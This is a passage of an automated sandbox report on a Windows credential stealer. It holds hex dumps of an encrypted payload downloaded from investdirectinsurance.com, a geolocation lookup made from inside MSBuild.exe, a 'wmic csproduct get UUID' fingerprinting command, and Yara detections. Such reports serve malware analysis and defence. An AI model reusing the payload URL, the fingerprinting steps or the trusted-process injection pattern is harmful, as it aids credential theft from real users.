                    Data Ascii: IuWGkR,YGAPoKI]b^<x7>{~TP8L+!LHLYL~3LLtL~KLLY&Ll?L{L~'/cLLY4=Nk~GAK^7]/zL~@Lo}$NLYpL~{c^LlLL=JHLY{G7L9LYR*6TPL+|QH^L~k~IL+Hh
                    2024-07-27 09:37:05 UTC1369INData Raw: 4c 7e 77 6d 5a 89 5e c8 26 ba ed b9 4c 6c 83 4c ae ec 49 ad 76 4d 7f b4 80 36 74 4c 59 3a 4c 2b f5 7e 9c be b8 bb 4a e1 05 0c 4c 7e 30 4c ea 3e ee b9 97 1f 3a b4 16 83 d7 4c ae 3e 4c 59 54 2a ba 49 4d eb 05 1a fe ee 4c 2b b3 4c 6c 9c 7c 1e b3 5e c8 f4 f2 b6 e4 4c ea 7a 4c 59 b5 1a cd ca 4d 6d 8a 80 54 da 4c 59 06 4c 7e ae 6d 5a f3 da 7c 37 05 91 24 4c 6c d8 4c ae 95 ee b9 3f 9e ef ed 40 b4 ad 4c 59 e5 4c 2b 78 a9 a8 37 4d af 8f ce da 72 4c 7e ea 4c ea d1 ee b9 0e 1f 3a 22 ef 8c 4e 4c ae d1 4c 59 8d 2a ba 14 4d eb e3 10 e6 43 4c 2b 2a 4c 6c 21 7c 1e 2e da 7c 1b 74 f0 bd 4c ea a7 4c 59 08 6f d9 87 9c 7d 63 d5 00 47 4c 59 5d 4c 7e 27 5a 4e 5e 4d 58 02 a9 3d 7e 4c 6c 45 4c ae 0c ee b9 d0 9e ef 43 42 b6 00 4c 59 bc 4c 2b a5 a9 a8 ec 4d af 2a c4 c2 ab 4c 7e b7
                    Data Ascii: L~wmZ^&LlLIvM6tLY:L+~JL~0L>:L>LYT*IML+Ll|^LzLYMmTLYL~mZ|7$LlL?@LYL+x7MrL~L:"NLLY*MCL+*Ll!|.|tLLYo}cGLY]L~'ZN^MX=~LlELCBLYL+M*L~
                    2024-07-27 09:37:05 UTC1369INData Raw: a2 c1 cb 6e c9 7e 49 e0 2b 6b 32 15 c0 f1 cb 6e f2 63 e4 92 6d 5a 20 54 50 76 6c db 2c 4c 6c 86 dc fc a3 25 62 42 5e 6e 0b 0e a8 a9 35 71 ed 4c 2b b0 4c 6c 3e 4c ae 0b 76 31 89 6e 1e 89 31 96 fd 49 ad 63 5d 79 63 67 e2 72 5c 3e 98 0f 1a fe 13 c6 1d 4c ea 07 4c 59 4b 4c 2b 4e c0 14 41 15 c0 43 49 ad 7d df ae dd 31 96 3e 5e c8 a6 0e 6a 9e 4c 6c 35 4c ae eb 49 ad 71 4c 7e 2f 5a 4e f7 49 ad 4c 5d 79 4c 67 e2 e9 e9 2a 8c 42 35 e2 75 f1 87 de 7a 4a 0f 1a b8 c6 13 29 4c 6c d1 4c ae 38 4c 59 cf 53 86 85 a0 07 3e c4 c2 22 91 e5 7d 51 84 00 a5 60 74 ee b9 e3 e0 66 6c a1 06 ec ee b9 fb 62 84 47 66 e3 cb c6 12 96 91 25 e6 1b db bb fc 49 02 4c 59 85 63 85 83 7e 9c f0 50 84 a2 9e 49 36 63 e4 54 6d 5a 11 10 e6 01 6f d9 47 b2 b4 e5 3a 79 b1 02 76 60 7a ea fc 6d 5a 4d c4
                    Data Ascii: n~I+k2ncmZ TPvl,Ll%bB^n5qL+Ll>Lv1n1Ic]ycgr\>LLYKL+NACI}1>^jLl5LIqL~/ZNIL]yLg*B5uzJ)LlL8LYS>"}Q`tflbGf%ILYc~PI6cTmZoG:yv`zmZM
                    2024-07-27 09:37:05 UTC1369INData Raw: 47 4c 2b 6a 4b 18 cd b0 b4 9f ee b9 cd a6 a2 f7 47 90 9d d3 67 04 71 d5 87 d9 c9 13 b0 b4 cf 30 95 43 74 f0 07 6d 5a 16 74 32 3f a0 04 f2 f5 b0 94 98 4b c4 c4 c2 a3 2a ba 43 17 42 94 1f 89 a2 63 85 a9 05 90 2c cb 18 e0 78 0d 14 74 f0 c7 5a 4e ec 0c 19 71 aa 3e 7e ed 8e 37 4c ae dc 1f 89 c8 82 54 fb de 7a 82 bc 29 4e 5d 79 07 a9 a8 bb b9 ba 22 ee b9 d4 63 e4 bc 17 42 e2 10 e6 ea d7 c1 32 d6 41 e8 40 94 46 e4 a1 3e 63 e4 ec 5c ba af 54 50 ea 4c 2b 38 66 e3 68 dc fc 43 a9 5c 89 d8 18 d4 6b 7e 8b 7b 0e 81 29 fd 6e 9c 7d b9 b7 b3 ee 4c 59 02 4c 7e 6e 7b ae 01 4c 59 b8 78 2e b4 b8 38 ec 4c ae 31 4c 59 7e 39 aa d1 09 9c f0 e0 04 a0 0e 6a 98 4c 6c 32 4c ae 61 d1 65 9b 16 00 4f cf 28 8c 05 02 1b 4c 2b 74 4c 6c 7a 7c 1e 74 5e c8 fb 88 cb 11 4c ea fd 4c 59 f3 38 6d
                    Data Ascii: GL+jKGgq0CtmZt2?K*CBc,xtZNq>~7LTz)N]y"cB2A@F>c\TPL+8fhC\k~{)n}LYL~n{LYx.8L1LY~9jLl2LaeO(L+tLlz|t^LLY8m
                    2024-07-27 09:37:05 UTC1369INData Raw: 8c ec b0 c0 14 51 fd 68 7b 4c 7e e7 4c ea 1e eb 1d 17 78 2e 1f b8 38 b6 b8 bb db 4e 5b 04 4c 7e 1c 4c ea 36 ee b9 9f 0a 1e 0d 83 56 db 4c ae 36 4c 59 4c 3d 4e 01 0e a8 18 08 ef fe e4 f1 9f 4c 6c 34 4c ae 03 74 32 d3 3e 4d 05 c4 50 c3 fd 68 1d 4c 2b c3 4c 6c 0a 0b d8 e7 a9 5c 9e 39 aa 23 4b df 0a 4e 5b 41 4c 2b 28 4c 6c 22 7c 1e 2c da 7c 8c 11 c5 be 4c ea a5 4c 59 0b 6f d9 d6 0d 2f ea 1e 7c 5d 47 41 5e 4c 7e e2 4c ea 10 74 32 a2 cb dc f2 42 97 67 6d 8f ed 4c 59 01 4c 7e 6d 7b ae f4 a9 5c db 48 5d f5 fa 79 ec 4f ad 33 4c 59 a9 4c 7e 55 6d 5a 3e da 7c c9 c5 10 9a 4c 6c 31 4c ae 7b ee b9 14 0d 3c 98 28 3c f3 49 ad 18 4c 2b 76 4c 6c f7 02 d7 01 5b bc 30 91 44 32 3f cb ff 4c 59 b4 4c 2b 49 4b 18 e0 48 9b 08 bb cd 36 7b eb b9 4e e9 a0 4c 59 cc 4c 2b 61 7e 9c 2a
                    Data Ascii: Qh{L~Lx.8N[L~L6VL6LYL=NLl4Lt2>MPhL+Ll\9#KN[AL+(Ll"|,|LLYo/|]GA^L~Lt2BgmLYL~m{\H]yO3LYL~UmZ>|Ll1L{<(<IL+vLl[0D2?LYL+IKH6{NLYL+a~*


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.549722172.67.189.1024437060C:\Users\user\Desktop\d34e1p5zD2.exe
                    TimestampBytes transferredDirectionData
                    2024-07-27 09:37:06 UTC134OUTGET /assuence/litesolidCha/Roozpiso.bd HTTP/1.1
                    User-Agent: Mozilla/5.0
                    Host: investdirectinsurance.com
                    Cache-Control: no-cache
                    2024-07-27 09:37:06 UTC685INHTTP/1.1 200 OK
                    Date: Sat, 27 Jul 2024 09:37:06 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 549888
                    Connection: close
                    etag: "86400-66a30813-31073;;;"
                    last-modified: Fri, 26 Jul 2024 02:21:07 GMT
                    accept-ranges: bytes
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZE%2BunltZJWjV5Pn2atAP7ruYbQrqBuGDam6IkDpSZ6XaiX4xgTHvWZIcS61%2FbKcwlE1Eg0Zxrn4A4BkN5v8nI1e%2FGb1OB8bsu2MwyxDpd%2FsskVQ%2BbxHsltpXXWshaWC0jQN74gymE9oJYlX"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a9ba620792c43fd-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-27 09:37:06 UTC684INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
                    Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                    2024-07-27 09:37:06 UTC1369INData Raw: fb 4c ae 05 ce da 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 69 ee 0c 1a 90 24 ea 9b 5a d2 4c ea b1 b4 f1 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 21 4c 7e a5 26 72 23 4c 59 ac bc 89 ae 05 90 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 05 0e 6a 81 b2 b4 d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b fc a7 21 ab 59 8a 60 4c 59 0a ac 9c e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae
                    Data Ascii: LL~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+Lli$ZL7L+LlfLLY!L~&r#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYjL)L~KLLYL+!Y`LYLxLY2L+LlcLLYL~LLYJL+'LlL
                    2024-07-27 09:37:06 UTC1369INData Raw: 3a 4d c2 4c 7e da 4c ea 4f 10 e6 3f 4c 2b 0e 05 90 41 b0 b4 1f 30 95 d1 74 f0 b9 10 66 1a fd 68 e8 37 e2 aa 7e 9c 05 59 8a 06 d5 d0 b9 f6 72 4d 4c ea 97 4c 59 28 6f d9 56 7e 9c b7 c0 14 7f 47 41 7d 4c 7e d1 4c ea 38 eb 1d a0 29 fd 63 22 e5 59 66 a2 df 4c 59 23 4c 7e 9b 6d 5a 3c c3 b5 c2 47 d2 a1 7e 9c dd 4c ae 80 4c 59 ef c9 8a 84 cc 2a bc 3a 4d d6 9a 0d 30 47 d1 77 0b d8 26 15 11 c0 eb 78 c0 a6 f0 02 49 ad 37 b7 22 f6 7c 9e 6b 4c ae 26 ee b9 e4 74 f0 b4 5a 4e 81 f5 b2 ca 91 e5 2f 4c 6c d7 4c ae 7a eb 1d 48 e0 66 e4 17 42 69 f5 b2 25 91 e5 b3 4c 6c 3c 4c ae 05 eb 1d 6c 7a ea d8 21 c6 65 c4 c2 49 d7 c1 60 66 e3 d8 d3 06 fb fd 68 69 b7 30 1e 4c ea ad e4 a1 67 14 01 34 5d bc 06 73 36 9f f5 b2 42 e0 66 42 4c ea ad 4c 59 a3 38 6d a8 fb 78 8a 66 a2 b3 c4 c2 21
                    Data Ascii: :ML~LO?L+A0tfh7~YrMLLY(oV~GA}L~L8)c"YfLY#L~mZ<G~LLY*:M0Gw&xI7"|kL&tZN/LlLzHfBi%Ll<Llz!eI`fhi0Lg4]s6BfBLLY8mxf!
                    2024-07-27 09:37:06 UTC1369INData Raw: 7e 43 5a 4e 0d a9 5c 60 4c 2b 07 31 77 32 cd 2f a0 d1 65 97 4c 7e 20 36 a2 94 4c 59 d8 4c 2b b5 4c 6c bb 7c 1e 64 4c 59 7f 4c 7e 5c a1 06 7c 4c 59 27 1f 3a 50 10 c5 5b 66 a2 dc 4c 59 a4 2a ba 5c 7b ae 2b 54 50 4e 4c 2b 97 a9 a8 da 48 9b 82 4c 59 86 63 e4 c5 8e 6b be 3a 4d d2 4c 2b d4 c2 17 80 4c ae 6a 4c 59 74 4c 7e 26 10 66 76 4c 59 39 4c 2b 68 66 e3 68 4c ae c7 5e c8 a3 f3 b7 3e 21 c6 0d 4c 59 e1 1a cd 68 4b 18 32 e9 2a 1f 2f 7a 86 7a ea 62 21 c6 d9 15 11 33 d7 c1 41 6e 4d b6 c6 12 61 4c 59 59 fc cc 95 7d 8a 74 54 50 6f b2 55 0e a9 a8 b3 9d bf 3a 7c a8 29 f6 72 1d 4c ea a3 49 ad 28 7e 49 2f a2 65 da 4c ae 67 1f 89 a8 88 cb 41 4c ea 50 97 92 25 8e e8 6e 7e 9c 35 4c ae 15 e0 04 7d f6 72 e9 4c ea 73 4c 59 b8 1a cd c2 4c 6c 4d 4c ae 5c 10 e6 0b 4c 7e 4c e5
                    Data Ascii: ~CZN\`L+1w2/eL~ 6LYL+Ll|dLYL~\|LY':P[fLY*\{+TPNL+HLYck:ML+LjLYtL~&fvLY9L+hfhL^>!LYhK2*/zzb!3AnMaLYY}tTPoU:|)rLI(~I/eLgALP%n~5L}rLsLYLlML\L~L
                    2024-07-27 09:37:06 UTC1369INData Raw: b7 fd 68 89 5d 79 88 66 e3 f4 80 54 cd f5 b2 ee 5d 6c d0 4c ea 7e 4c 59 71 38 6d cf 4c 6c d5 ed 0f 39 49 ad 89 91 44 e2 80 36 21 4c 59 4d 4c 2b 64 4b 18 e2 b0 b4 b1 ee b9 97 72 77 46 4c ea 33 10 e6 23 6f d9 9d 0a 59 82 4c ae 69 4c 59 76 4c 7e d4 23 c5 16 6e 38 3b 4c 2b c4 4c 6c 5e 59 8a d5 4c 59 0d 4c 7e 31 4c ea 0e 4d 58 47 4c 2b 2e 4c 6c d6 4c ae 7a ea 1c 91 4c 7e 49 4c ea 93 4c 59 a8 38 6d be e4 60 3d 4c ae 63 4c 59 7f eb 78 e5 4c ea 7b 4c 59 30 4c 2b ca 4c 6c 61 4c ae db 4c 59 07 4c 7e 8b 6b 7e 04 4c 59 48 4c 2b 25 4c 6c e9 bc 9e 34 4c 59 af 4c 7e 43 4c ea 9a cb 6e d8 a3 07 9d 4c 6c 37 4c ae 4a ab 5e 7f f6 72 eb 4c ea 70 4c 59 39 9a 0d c1 4c 6c 4f 4c ae d0 4c 59 08 4c 7e 14 4c ea 0a 4c 59 42 4c 2b f7 31 77 11 cd 2f ee 1a fe a4 4c 7e 75 11 67 fa e1 05
                    Data Ascii: h]yfT]lL~LYq8mLl9ID6!LYML+dKrwFL3#oYLiLYvL~#n8;L+Ll^YLYL~1LMXGL+.LlLzL~ILLY8m`=LcLYxL{LY0L+LlaLLYL~k~LYHL+%Ll4LYL~CLnLl7LJ^rLpLY9LlOLLYL~LLYBL+1w/L~ug
                    2024-07-27 09:37:06 UTC1369INData Raw: 78 2e cc 4c 6c 66 4c ae 9b eb 1d c4 0b 0b 59 ae 9a 23 4c 59 4f 4c 2b 12 4c 6c eb b8 bb 54 99 3e 99 4c 7e 45 4c ea 6b ee b9 f2 3d 0a 4e 1a 48 88 62 a7 21 f3 14 10 3b a8 ff dc 78 b6 cc d8 98 6f d9 c6 4c 6c 69 4c ae 00 3a 4d dc 9e ef 7c 61 84 0c 4c 59 44 4c 2b 69 4b 18 04 5e 3c e5 e0 04 88 63 e4 4b 4c ea 90 4c 59 d4 a3 07 1c 47 d1 88 6b a8 66 cb 6e 58 fc cc 76 1e fb 8d 7b 0e 32 4c 2b c9 4c 6c 04 0b d8 bc 7a 0f ca 16 00 82 97 c0 21 cb 6e b9 ef 19 f4 9c 7d be 18 cb 36 4c 59 ac 4c 7e f4 7b ae f8 7a 0f 77 1f 3a 3a eb e9 34 4c ae 4e 4c 59 16 c9 8a 79 1e fb 4b a7 e0 1d 4c 2b c3 4c 6c 0a 0b d8 d3 4d 58 9d 3b a8 16 4c ea 09 4c 59 71 6f d9 fe fa 79 85 fb fb 39 4c 59 a6 4c 7e 5e 6d 5a 2c d5 d0 78 1f 3a 94 4c 6c 3a 4c ae 03 eb 1d 6b 7b eb 37 09 9c 5d 4c 59 17 4c 2b dc
                    Data Ascii: x.LlfLY#LYOL+LlT>L~ELk=NHb!;xoLliL:M|aLYDL+iK^<cKLLYGkfnXv{2L+Llz!n}6LYL~{zw::4LNLYyKL+LlMX;LLYqoy9LYL~^mZ,x:Ll:Lk{7]LYL+
                    2024-07-27 09:37:06 UTC1369INData Raw: 77 dd 4c ae 80 4c 59 b3 f6 72 8a 50 24 9e cb 6e d6 9a 0d 9b bd 5f 12 9d bf 1d 7b 0e 77 4c 7e ef 4c ea 32 eb 1d cc 68 bf 48 47 d1 54 50 84 29 c1 b6 fc fc cc 21 1e fb 59 7b 0e 46 4c 2b 2f 4c 6c 90 0b d8 e8 7a 0f 81 9e ef 75 c7 53 92 4c 59 ee 4c 2b d7 4b 18 2d 9d bf 53 fd 68 78 4c 7e e4 4c ea 1d eb 1d 30 4d 2a 8a 0d 2f 60 4c ae da 4c 59 36 3d 4e 2b 4b df 47 0f 1a 49 4c 2b 24 4c 6c 2a 7c 1e ff d5 d0 b7 44 53 42 4c ea ad 4c 59 a3 38 6d a9 fa 79 75 0d ef 4d 4c 59 72 4c 7e 09 6d 5a bf 10 e6 73 f5 61 25 99 8b e4 e4 21 d1 4c 59 09 4c 7e 97 8d 68 34 f5 b2 56 cb dc 2a 4c 6c d2 4c ae 5f eb 1d 73 59 98 51 26 72 9b d1 65 eb 4c 2b 55 ce af 97 c0 14 72 5b bc 5d 4c 7e e1 4c ea 18 eb 1d ae 47 d2 57 74 71 45 4c ae ef 4c 59 b7 c9 8a 16 76 e3 24 3a 4d 86 63 85 75 78 fb c3 b0
                    Data Ascii: wLLYrP$n_{wL~L2hHGTP)!Y{FL+/LlzuSLYL+K-ShxL~L0M*/`LLY6=N+KGIL+$Ll*|DSBLLY8myuMLYrL~mZsa%!LYL~h4V*LlL_sYQ&reL+Ur[]L~LGWtqELLYv$:Mcux
                    2024-07-27 09:37:06 UTC1369INData Raw: 5e 3a 4d 7d 72 77 65 50 24 1f 74 32 f9 cc a9 46 8d ed 74 73 36 d6 4c 59 0e 4c 7e 3e 21 c6 df 5e c8 28 e3 46 2c 4c 6c d4 4c ae 79 eb 1d 13 8c ff 7a 6d 5a 91 4c 59 ed 4c 2b 44 1a 48 2f 9d bf 2c 92 26 7a 4c 7e e6 4c ea 1f eb 1d 22 1f 3a 0b cd ad 62 4c ae d9 4c 59 41 c9 8a 0c 1e fb aa 51 a4 4b 4c 2b 26 4c 6c ad 0b d8 36 4d 58 90 72 77 41 4c ea af 4c 59 04 6f d9 ab fa 79 3c 62 a7 4f 4c 59 71 4c 7e 0b 6d 5a ba d5 d0 49 e9 7c c2 4c 6c 4d 4c ae a4 eb 1d dc 7b eb 1e 76 e3 08 4c 59 40 4c 2b 89 7e 9c c4 b8 bb 1d a9 5c a7 4c 7e bf 4c ea 44 ee b9 d9 3d 0a 41 1a 48 36 62 a7 f5 6e 38 78 eb 78 62 cf 28 ec ee b9 16 4c 2b 7d 4c 6c 53 59 8a 7d 5e c8 4e b7 30 18 4c ea 02 4c 59 fa 38 6d 30 5f bf b5 14 c1 29 c4 c2 a8 4c 7e b4 4c ea 92 d1 65 4f d1 a6 9c 2b 6b 36 6b a8 b9 2f 7a
                    Data Ascii: ^:M}rweP$t2Fts6LYL~>!^(F,LlLyzmZLYL+DH/,&zL~L":bLLYAQKL+&Ll6MXrwALLYoy<bOLYqL~mZI|LlML{vLY@L+~\L~LD=AH6bn8xxb(L+}LlSY}^N0LLY8m0_)L~LeO+k6k/z
                    2024-07-27 09:37:06 UTC1369INData Raw: 4c 7e 31 4c ea 4b eb 1d d0 eb 7e 01 31 77 fa 66 a2 3f 4c 59 53 cf bc 77 c4 50 46 5b bc ef 4c 2b b2 4c 6c 79 0b d8 c8 f5 b2 26 22 a7 e5 4c ea 7b 4c 59 54 38 6d 17 71 37 5b 50 84 db 4c 59 07 4c 7e bb 5a 4e 3e f5 b2 f9 ac 58 25 4c 6c d9 4c ae 70 eb 1d af 4c 7e 43 4c ea ac 4c 59 5a 63 85 cd dd 3c 26 9d bf 2e bc 29 73 4c 7e eb 4c ea 16 eb 1d 21 26 31 43 8e ef a4 a5 60 52 ce da 71 66 23 4e e5 b0 8e 49 ad 42 4c 2b 2b 4c 6c d3 4c ae 65 84 82 c2 3b a8 bc 4c ea a6 4c 59 8d 38 6d 8c 31 77 02 a5 60 a9 10 e6 b6 74 f0 6e a1 06 0d 1f 89 04 1f 3a 32 c2 17 44 4c ae ee 4c 59 b6 c9 8a a5 c4 50 0d d1 65 bd 4c 2b 20 4c 6c d1 62 a7 2b c4 c2 1d 19 d8 93 4b df 26 d6 d3 e1 4c 2b 98 4c 6c 92 7c 1e 68 fd 68 c2 9b 5a e3 76 e3 74 fd 68 1c 9a 0d 1d c2 17 96 b3 b6 64 cc d8 1d 3d 4e 11
                    Data Ascii: L~1LK~1wf?LYSwPF[L+Lly&"L{LYT8mq7[PLYL~ZN>X%LlLpL~CLLYZc<&.)sL~L!&1C`Rqf#NIBL++LlLe;LLY8m1w`tn:2DLLYPeL+ Llb+K&L+Ll|hhZvthd=N
                    2024-07-27 09:37:06 UTC1369INData Raw: ea 60 ee b9 51 74 a2 4c d6 41 3f 4c ae 60 4c 59 1c c9 8a c2 4b df f9 8c 98 32 4c 2b c9 4c 6c c3 7c 1e 72 10 e6 d0 19 d8 4a aa bc a8 52 a7 4a 4c 2b 27 4c 6c 1a ce 2c 9d f5 b2 49 fa 6b 40 4c ea ae 4c 59 a1 38 6d 50 42 97 19 b7 b3 4e 4c 59 70 4c 7e 8e 7b ae 7b 54 50 89 29 fd 4c 66 e3 82 80 54 c9 c4 c2 5e b8 2a 23 4b df 4c 89 2c 41 4c 2b 28 4c 6c 22 7c 1e 88 fd 68 b2 9b 5a 43 76 e3 94 fd 68 ef 9a 0d ee c2 17 1a bc 9e 84 cc d8 ee 3d 4e e2 4c ea 5d 4c 59 83 29 fd 6d 9c 7d 2b 27 e3 ed 4c 59 01 4c 7e 6d 7b ae 28 25 62 25 41 b4 fa 31 77 ee 4c ae 33 4c 59 91 f6 72 38 50 24 ac cb 6e e4 9a 0d a9 bd 5f 20 9d bf 2e 7b 0e 55 4c 7e cd 4c ea 10 eb 1d 7f 68 bf 67 9c 7d 14 32 77 e7 4c 59 fd 4c 7e 67 7b ae ee 5e c8 15 2c 9a 0d 4c 6c e5 4c ae 58 eb 1d a2 4d 7f fe 99 8f a0 4c
                    Data Ascii: `QtLA?L`LYK2L+Ll|rJRJL+'Ll,Ik@LLY8mPBNLYpL~{{TP)LfT^*#KL,AL+(Ll"|hZCvh=NL]LY)m}+'LYL~m{(%b%A1wL3LYr8P$n_ .{UL~Lhg}2wLYL~g{^,LlLXML


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.54972334.117.59.814433116C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-07-27 09:37:08 UTC63OUTGET /json HTTP/1.1
                    Host: ipinfo.io
                    Connection: Keep-Alive
                    2024-07-27 09:37:08 UTC345INHTTP/1.1 200 OK
                    access-control-allow-origin: *
                    Content-Length: 319
                    content-type: application/json; charset=utf-8
                    date: Sat, 27 Jul 2024 09:37:08 GMT
                    x-content-type-options: nosniff
                    via: 1.1 google
                    strict-transport-security: max-age=2592000; includeSubDomains
                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                    Connection: close
                    2024-07-27 09:37:08 UTC319INData Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22
                    Data Ascii: { "ip": "8.46.123.33", "hostname": "static-cpe-8-46-123-33.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone": "


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:05:37:03
                    Start date:27/07/2024
                    Path:C:\Users\user\Desktop\d34e1p5zD2.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\d34e1p5zD2.exe"
                    Imagebase:0x50000
                    File size:77'824 bytes
                    MD5 hash:53C82AADE0F798222F64759C56D0FA4D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2129759633.0000000012549000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:2
                    Start time:05:37:07
                    Start date:27/07/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    Imagebase:0x810000
                    File size:262'432 bytes
                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4558454375.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4564261555.0000000002B64000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:false

                    Target ID:3
                    Start time:05:37:08
                    Start date:27/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Target ID:4
                    Start time:05:37:08
                    Start date:27/07/2024
                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                    Wow64 process (32bit):true
                    Commandline:"wmic" csproduct get UUID
                    Imagebase:0x390000
                    File size:427'008 bytes
                    MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:5
                    Start time:05:37:08
                    Start date:27/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6d64d0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Reset < >

                      Execution Graph

                      Execution Coverage:23.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:9.1%
                      Total number of Nodes:33
                      Total number of Limit Nodes:0

                      Control-flow Graph

                      APIs
                      Memory Dump Source
